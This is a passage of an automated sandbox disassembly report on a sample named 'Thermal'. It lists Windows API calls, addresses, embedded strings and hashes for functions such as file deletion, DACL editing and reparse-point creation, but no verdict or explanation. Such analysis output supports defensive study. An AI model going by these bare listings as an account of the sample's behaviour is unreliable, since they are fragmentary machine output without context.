                                                      • VariantClear.OLEAUT32(00000000), ref: 0018832F
                                                      • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0018841D
                                                      • __swprintf.LIBCMT ref: 0018844D
                                                      • VarR8FromDec.OLEAUT32(?,?), ref: 00188479
                                                      • VariantInit.OLEAUT32(?), ref: 0018852A
                                                      • SysFreeString.OLEAUT32(?), ref: 001885BE
                                                      • VariantClear.OLEAUT32(?), ref: 00188618
                                                      • VariantClear.OLEAUT32(?), ref: 00188627
                                                      • VariantInit.OLEAUT32(00000000), ref: 00188665
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                      • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                      • API String ID: 3730832054-3931177956
                                                      • Opcode ID: 364d2de7d2b6b86ba2dc518df9aeacb8660934b586ec79b2698aa8fcb692dab4
                                                      • Instruction ID: 2a58afbb83036ca02c6d86dff3372b4d3c531ea0446f3edf0995bdae2af08f7f
                                                      • Opcode Fuzzy Hash: 364d2de7d2b6b86ba2dc518df9aeacb8660934b586ec79b2698aa8fcb692dab4
                                                      • Instruction Fuzzy Hash: 71D10131604615EBDB24BFA9C884B6EB7B4FF18B00F658555E805AB290DF30EE40DFA0
                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?), ref: 001A4A61
                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 001A4AAC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: BuffCharMessageSendUpper
                                                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                      • API String ID: 3974292440-4258414348
                                                      • Opcode ID: 697c42c305d003569a81baf64a7dd5033ae90d01cd1f15b14b1e62e6ee4c97fa
                                                      • Instruction ID: dd987ae9bc8ef64d5d2721099816884645db8f326bc1eea1d1f4c878a9e8450c
                                                      • Opcode Fuzzy Hash: 697c42c305d003569a81baf64a7dd5033ae90d01cd1f15b14b1e62e6ee4c97fa
                                                      • Instruction Fuzzy Hash: 9791B0342047119FCB05EF60C451A6EB7A1BFE9354F10885DF89A5B3A2CB71ED5ACB82
                                                      APIs
                                                      • GetLocalTime.KERNEL32(?), ref: 0018E31F
                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 0018E32F
                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0018E33B
                                                      • __wsplitpath.LIBCMT ref: 0018E399
                                                      • _wcscat.LIBCMT ref: 0018E3B1
                                                      • _wcscat.LIBCMT ref: 0018E3C3
                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0018E3D8
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0018E3EC
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0018E41E
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0018E43F
                                                      • _wcscpy.LIBCMT ref: 0018E44B
                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0018E48A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                      • String ID: *.*
                                                      • API String ID: 3566783562-438819550
                                                      • Opcode ID: eb22aa2132a99f1f07d9d5f881ead84f34c2079b409acc1ca5bc42d0cb4ac8f4
                                                      • Instruction ID: 759fdf1cdf57d65040d77a6d69ad8a4fa6d285053542e2ee9002e4b4e3e692da
                                                      • Opcode Fuzzy Hash: eb22aa2132a99f1f07d9d5f881ead84f34c2079b409acc1ca5bc42d0cb4ac8f4
                                                      • Instruction Fuzzy Hash: 156157725046159FC710EF60D884A9EB3E9FF99310F04891EF989C7251EB35EA49CF92
                                                      APIs
                                                      • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 0018A2C2
                                                        • Part of subcall function 00131A36: _memmove.LIBCMT ref: 00131A77
                                                      • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 0018A2E3
                                                      • __swprintf.LIBCMT ref: 0018A33C
                                                      • __swprintf.LIBCMT ref: 0018A355
                                                      • _wprintf.LIBCMT ref: 0018A3FC
                                                      • _wprintf.LIBCMT ref: 0018A41A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: LoadString__swprintf_wprintf$_memmove
                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                      • API String ID: 311963372-3080491070
                                                      • Opcode ID: 73a3f056db6b288f67b833d30343a532c5b3a65a0af5079f4da401ce61fb36ef
                                                      • Instruction ID: d4fef7fcbbab72af28739ac8920f3795f233ff2fdfec6f9c9a8847cb42c1a600
                                                      • Opcode Fuzzy Hash: 73a3f056db6b288f67b833d30343a532c5b3a65a0af5079f4da401ce61fb36ef
                                                      • Instruction Fuzzy Hash: EF519D71900109BADF15EBE0CD86EEEB779AF28340F500166F505B21A2EB752F58DB61
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,0016F8B8,00000001,0000138C,00000001,00000000,00000001,?,00193FF9,00000000), ref: 0018009A
                                                      • LoadStringW.USER32(00000000,?,0016F8B8,00000001), ref: 001800A3
                                                        • Part of subcall function 00131A36: _memmove.LIBCMT ref: 00131A77
                                                      • GetModuleHandleW.KERNEL32(00000000,001E7310,?,00000FFF,?,?,0016F8B8,00000001,0000138C,00000001,00000000,00000001,?,00193FF9,00000000,00000001), ref: 001800C5
                                                      • LoadStringW.USER32(00000000,?,0016F8B8,00000001), ref: 001800C8
                                                      • __swprintf.LIBCMT ref: 00180118
                                                      • __swprintf.LIBCMT ref: 00180129
                                                      • _wprintf.LIBCMT ref: 001801D2
                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 001801E9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                      • API String ID: 984253442-2268648507
                                                      • Opcode ID: 6987ed7ae304fb3bd5763c1adfff3b78dbb420d22188f4526bbca7603179ab8f
                                                      • Instruction ID: 4c26d2d4c2541a1bb990633ca2ec230244caa82289cc53b63b37e4a044778e2f
                                                      • Opcode Fuzzy Hash: 6987ed7ae304fb3bd5763c1adfff3b78dbb420d22188f4526bbca7603179ab8f
                                                      • Instruction Fuzzy Hash: 9641057280021DBACF15FBE0CD96EEEB779AF28341F500165F505A2092EB756F49CBA1
                                                      APIs
                                                        • Part of subcall function 00124D37: __itow.LIBCMT ref: 00124D62
                                                        • Part of subcall function 00124D37: __swprintf.LIBCMT ref: 00124DAC
                                                      • CharLowerBuffW.USER32(?,?), ref: 0018AA0E
                                                      • GetDriveTypeW.KERNEL32 ref: 0018AA5B
                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0018AAA3
                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0018AADA
                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0018AB08
                                                        • Part of subcall function 00131821: _memmove.LIBCMT ref: 0013185B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                      • API String ID: 2698844021-4113822522
                                                      • Opcode ID: 477ace34baa7367019094408527662ae4dd6984b2bef9f82bea5606995b20386
                                                      • Instruction ID: 9d2dccaf92725e0472ca8048f63a1c8b8ec3787b9ebbb403ecfee0b5b3633cf6
                                                      • Opcode Fuzzy Hash: 477ace34baa7367019094408527662ae4dd6984b2bef9f82bea5606995b20386
                                                      • Instruction Fuzzy Hash: 5A515A71104205AFD700EF50C98196AB7F4FFA8758F50896EF896972A1DB31EE09CF92
                                                      APIs
                                                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0018A852
                                                      • __swprintf.LIBCMT ref: 0018A874
                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 0018A8B1
                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0018A8D6
                                                      • _memset.LIBCMT ref: 0018A8F5
                                                      • _wcsncpy.LIBCMT ref: 0018A931
                                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0018A966
                                                      • CloseHandle.KERNEL32(00000000), ref: 0018A971
                                                      • RemoveDirectoryW.KERNEL32(?), ref: 0018A97A
                                                      • CloseHandle.KERNEL32(00000000), ref: 0018A984
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                      • String ID: :$\$\??\%s
                                                      • API String ID: 2733774712-3457252023
                                                      • Opcode ID: ba0b9b195f511d25984a13fd7c122baf2f30572e03668449c5f89d901c2aa7ee
                                                      • Instruction ID: 2ec502c01e0df626dbb941b9c886568fd79970b5fe60ff4618c59b86baf0cc15
                                                      • Opcode Fuzzy Hash: ba0b9b195f511d25984a13fd7c122baf2f30572e03668449c5f89d901c2aa7ee
                                                      • Instruction Fuzzy Hash: B331AF7190421AABEB219FA0DC49FEB77BCEF89700F5041A6F909D6160EB7097858F25
                                                      APIs
                                                      • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,001A982C,?,?), ref: 001AC0C8
                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,001A982C,?,?,00000000,?), ref: 001AC0DF
                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,001A982C,?,?,00000000,?), ref: 001AC0EA
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,001A982C,?,?,00000000,?), ref: 001AC0F7
                                                      • GlobalLock.KERNEL32(00000000), ref: 001AC100
                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,001A982C,?,?,00000000,?), ref: 001AC10F
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 001AC118
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,001A982C,?,?,00000000,?), ref: 001AC11F
                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,001A982C,?,?,00000000,?), ref: 001AC130
                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,001B3C7C,?), ref: 001AC149
                                                      • GlobalFree.KERNEL32(00000000), ref: 001AC159
                                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 001AC17D
                                                      • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 001AC1A8
                                                      • DeleteObject.GDI32(00000000), ref: 001AC1D0
                                                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 001AC1E6
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                      • String ID:
                                                      • API String ID: 3840717409-0
                                                      • Opcode ID: 848dee3abfe49fb771ab041ee13395dcb15913ca733ab01601f29728af95bd25
                                                      • Instruction ID: cc00a898fa68c85ac288cf619590ddf684689b4df714166639bcb34dabeacd71
                                                      • Opcode Fuzzy Hash: 848dee3abfe49fb771ab041ee13395dcb15913ca733ab01601f29728af95bd25
                                                      • Instruction Fuzzy Hash: 85412979600208EFDB229F65DC88EAF7BB8EF8A711F104159F905E7260DB319D81DB60
                                                      APIs
                                                        • Part of subcall function 001229E2: GetWindowLongW.USER32(?,000000EB), ref: 001229F3
                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 001AC8A4
                                                      • GetFocus.USER32 ref: 001AC8B4
                                                      • GetDlgCtrlID.USER32(00000000), ref: 001AC8BF
                                                      • _memset.LIBCMT ref: 001AC9EA
                                                      • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 001ACA15
                                                      • GetMenuItemCount.USER32(?), ref: 001ACA35
                                                      • GetMenuItemID.USER32(?,00000000), ref: 001ACA48
                                                      • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 001ACA7C
                                                      • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 001ACAC4
                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 001ACAFC
                                                      • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 001ACB31
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                      • String ID: 0
                                                      • API String ID: 1296962147-4108050209
                                                      • Opcode ID: 86b3f1a5e02d199c48dce620433c06f3e7e0427f17f845a83aa4b02bd19d3cb1
                                                      • Instruction ID: 9d91df65ad6927c00aca7ab730ea535b6daef885fa5657453066645fd5984bb0
                                                      • Opcode Fuzzy Hash: 86b3f1a5e02d199c48dce620433c06f3e7e0427f17f845a83aa4b02bd19d3cb1
                                                      • Instruction Fuzzy Hash: 2981BF78608305AFD721CF14D885EABBBE8FF8A354F00492DF98597291D731D945CBA2
                                                      APIs
                                                        • Part of subcall function 00178E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00178E3C
                                                        • Part of subcall function 00178E20: GetLastError.KERNEL32(?,00178900,?,?,?), ref: 00178E46
                                                        • Part of subcall function 00178E20: GetProcessHeap.KERNEL32(00000008,?,?,00178900,?,?,?), ref: 00178E55
                                                        • Part of subcall function 00178E20: HeapAlloc.KERNEL32(00000000,?,00178900,?,?,?), ref: 00178E5C
                                                        • Part of subcall function 00178E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00178E73
                                                        • Part of subcall function 00178EBD: GetProcessHeap.KERNEL32(00000008,00178916,00000000,00000000,?,00178916,?), ref: 00178EC9
                                                        • Part of subcall function 00178EBD: HeapAlloc.KERNEL32(00000000,?,00178916,?), ref: 00178ED0
                                                        • Part of subcall function 00178EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00178916,?), ref: 00178EE1
                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00178B2E
                                                      • _memset.LIBCMT ref: 00178B43
                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00178B62
                                                      • GetLengthSid.ADVAPI32(?), ref: 00178B73
                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00178BB0
                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00178BCC
                                                      • GetLengthSid.ADVAPI32(?), ref: 00178BE9
                                                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00178BF8
                                                      • HeapAlloc.KERNEL32(00000000), ref: 00178BFF
                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00178C20
                                                      • CopySid.ADVAPI32(00000000), ref: 00178C27
                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00178C58
                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00178C7E
                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00178C92
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                      • String ID:
                                                      • API String ID: 3996160137-0
                                                      • Opcode ID: 680de41fa1df044c69323d708d5a117354e8bea419b87a65ba9e7e71e5b9ea98
                                                      • Instruction ID: e064888d4c06f9098c569d2fddff8212bcd464eef7d41b55c4e5750caf1a47cb
                                                      • Opcode Fuzzy Hash: 680de41fa1df044c69323d708d5a117354e8bea419b87a65ba9e7e71e5b9ea98
                                                      • Instruction Fuzzy Hash: 10615A71940209AFDF12DFA4DC49EEEBB79FF18300F048269F919A7290DB359A45CB60
                                                      APIs
                                                      • GetDC.USER32(00000000), ref: 00197A79
                                                      • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00197A85
                                                      • CreateCompatibleDC.GDI32(?), ref: 00197A91
                                                      • SelectObject.GDI32(00000000,?), ref: 00197A9E
                                                      • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00197AF2
                                                      • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00197B2E
                                                      • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00197B52
                                                      • SelectObject.GDI32(00000006,?), ref: 00197B5A
                                                      • DeleteObject.GDI32(?), ref: 00197B63
                                                      • DeleteDC.GDI32(00000006), ref: 00197B6A
                                                      • ReleaseDC.USER32(00000000,?), ref: 00197B75
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                      • String ID: (
                                                      • API String ID: 2598888154-3887548279
                                                      • Opcode ID: 1a1d5eba04349e57df95896fa8ac8cd6d871056ea84d0cf8c4beb6e2bbd531d2
                                                      • Instruction ID: 18da9d68fc09f8aaf1c463cc256bfef8ef96f6ad262e6a3da5b453c444e3c461
                                                      • Opcode Fuzzy Hash: 1a1d5eba04349e57df95896fa8ac8cd6d871056ea84d0cf8c4beb6e2bbd531d2
                                                      • Instruction Fuzzy Hash: DC513771A04209EFCB15DFA8CC85EAFBBB9EF48750F18851DF94AA7250D731AD418B60
                                                      APIs
                                                      • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 0018A4D4
                                                        • Part of subcall function 00131A36: _memmove.LIBCMT ref: 00131A77
                                                      • LoadStringW.USER32(?,?,00000FFF,?), ref: 0018A4F6
                                                      • __swprintf.LIBCMT ref: 0018A54F
                                                      • __swprintf.LIBCMT ref: 0018A568
                                                      • _wprintf.LIBCMT ref: 0018A61E
                                                      • _wprintf.LIBCMT ref: 0018A63C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.2555457650.0000000000121000.00000020.00000001.01000000.00000008.sdmp, Offset: 00120000, based on PE: true
                                                      • Associated: 0000000C.00000002.2555347509.0000000000120000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001B0000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555545618.00000000001D6000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555616779.00000000001E0000.00000004.00000001.01000000.00000008.sdmp
                                                      • Associated: 0000000C.00000002.2555663668.00000000001E9000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_120000_Thermal.jbxd
                                                      Similarity
                                                      • API ID: LoadString__swprintf_wprintf$_memmove
                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                      • API String ID: 311963372-2391861430
                                                      • Opcode ID: 9e906ce9f15f42111af160686c625818126419b6a13f434042d333f98801c184
                                                      • Instruction ID: df2bd5f9dace8ef98bf83e6ad184d8a2dc9879232ea20260f970ff07bdeccee4
                                                      • Opcode Fuzzy Hash: 9e906ce9f15f42111af160686c625818126419b6a13f434042d333f98801c184
                                                      • Instruction Fuzzy Hash: C7515D71800109BBDF15EBE0CD86EEEB779AF28340F644166F505A21A1EB316F98DF61
                                                      APIs
                                                        • Part of subcall function 0018951A: __time64.LIBCMT ref: 00189524
                                                        • Part of subcall function 00134A8C: _fseek.LIBCMT ref: 00134AA4
                                                      • __wsplitpath.LIBCMT ref: 001897EF
                                                        • Part of subcall function 0014431E: __wsplitpath_helper.LIBCMT ref: 0014435E
                                                      • _wcscpy.LIBCMT ref: 00189802
                                                      • _wcscat.LIBCMT ref: 00189815
                                                      • __wsplitpath.LIBCMT ref: 0018983A
                                                      • _wcscat.LIBCMT ref: 00189850
                                                      • _wcscat.LIBCMT ref: 00189863
                                                        • Part of subcall function 00189560: _memmove.LIBCMT ref: 00189599
                                                        • Part of subcall function 00189560: _memmove.LIBCMT ref: 001895A8
                                                      • _wcscmp.LIBCMT ref: 001897AA
                                                        • Part of subcall function 00189CF1: _wcscmp.LIBCMT ref: 00189DE1
                                                        • Part of subcall function 00189CF1: _wcscmp.LIBCMT ref: 00189DF4
                                                      • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00189A0D
                                                      • _wcsncpy.LIBCMT ref: 00189A80
                                                      • DeleteFileW.KERNEL32(?,?), ref: 00189AB6
                                                      • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00189ACC
                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00189ADD
